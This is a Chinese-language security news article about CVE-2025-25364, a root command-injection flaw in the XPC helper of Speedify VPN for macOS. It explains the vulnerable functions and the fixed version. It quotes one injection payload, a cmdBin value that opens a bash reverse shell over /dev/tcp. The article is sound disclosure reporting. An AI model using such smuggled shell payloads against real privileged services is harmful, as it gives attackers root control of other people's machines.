關(guān)鍵詞

安全漏洞

Speedify VPN 的macOS 應(yīng)用程序中發(fā)現(xiàn)了一個(gè)重大安全漏洞，編號(hào)為 CVE-2025-25364，該漏洞使用戶面臨本地權(quán)限提升和整個(gè)系統(tǒng)被入侵的風(fēng)險(xiǎn)。

SecureLayer7 發(fā)現(xiàn)的該漏洞存在于特權(quán)輔助工具 me.connectify.SMJobBlessHelper 中，該工具負(fù)責(zé)為 Speedify VPN 客戶端以 root 權(quán)限執(zhí)行系統(tǒng)級(jí)操作。該漏洞源于輔助工具的XPC（跨進(jìn)程通信）接口中不正確的輸入驗(yàn)證。

具體來(lái)說(shuō)，傳入的 XPC 消息中的兩個(gè)用戶控制字段（cmdPath 和 cmdBin）被直接用于構(gòu)造命令行字符串，而沒(méi)有經(jīng)過(guò)充分的清理。

這個(gè)疏忽導(dǎo)致了命令注入漏洞，允許任何本地攻擊者制作惡意 XPC 消息并注入以 root 身份執(zhí)行的任意 shell 命令。

攻擊鏈涉及幾個(gè)功能：

XPC_Connection_Handler_block_invoke： XPC 消息的入口點(diǎn)。它檢查字典類型的消息，如果“request”字段為“runSpeedify”，則調(diào)用 _handleLaunchSpeedifyMsg。cmdPath 或 cmdBin 的內(nèi)容未進(jìn)行驗(yàn)證。

_handleLaunchSpeedifyMsg：從 XPC 字典中檢索 cmdPath 和 cmdBin，并將它們（未經(jīng)檢查）傳遞給下一個(gè)函數(shù)。

_RunSystemCmd：使用 asprintf 構(gòu)造并執(zhí)行命令字符串，直接嵌入用戶提供的 cmdPath 和 cmdBin。關(guān)鍵代碼如下：

然后使用 system() 執(zhí)行該命令字符串，這使得攻擊者可以輕松注入其他 shell 命令。

風(fēng)險(xiǎn)因素細(xì)節(jié)受影響的產(chǎn)品 適用于 macOS 的 Speedify VPN（最高版本 15.0.0） 影響 本地權(quán)限提升；以 root 身份執(zhí)行任意命令。 漏洞利用前提條件 本地訪問(wèn)；能夠?qū)⒕脑O(shè)計(jì)的 XPC 消息發(fā)送給輔助工具 CVSS 3.1 評(píng)分 9.8（嚴(yán)重）

概念驗(yàn)證漏洞

概念驗(yàn)證 (PoC) 漏洞通過(guò)向易受攻擊的服務(wù)發(fā)送精心設(shè)計(jì)的 XPC 消息 證明了該問(wèn)題。

通過(guò)將 cmdBin 設(shè)置為諸如“; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ”之類的有效載荷，攻擊者可以生成具有 root 權(quán)限的反向 shell。該漏洞代碼以 Objective-C 編寫，連接到 me.connectify.SMJobBlessHelper XPC 服務(wù)并傳遞惡意負(fù)載，從而立即獲得 root 級(jí)訪問(wèn)權(quán)限。

由于輔助工具作為根級(jí)守護(hù)進(jìn)程

(/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper) 運(yùn)行，成功利用該漏洞意味著攻擊者可以：

讀取、修改或刪除敏感系統(tǒng)文件。

安裝持久性惡意軟件或后門。

完全控制受影響的 macOS 設(shè)備。

因此，此漏洞對(duì)運(yùn)行 Speedify VPN 易受攻擊版本（15.4.1 之前版本）的任何系統(tǒng)都構(gòu)成嚴(yán)重風(fēng)險(xiǎn)。

Speedify VPN在 15.4.1 版本中解決了該漏洞，其中包括對(duì)輔助工具的完全重寫。

新版本消除了不安全的 XPC 處理并實(shí)現(xiàn)了適當(dāng)?shù)妮斎腧?yàn)證，關(guān)閉了命令注入向量。

強(qiáng)烈建議用戶更新到最新版本，以降低被利用的風(fēng)險(xiǎn)。

安全圈

網(wǎng)羅圈內(nèi)熱點(diǎn) 專注網(wǎng)絡(luò)安全

實(shí)時(shí)資訊一手掌握！

好看你就分享 有用就點(diǎn)個(gè)贊

支持「安全圈」就點(diǎn)個(gè)三連吧！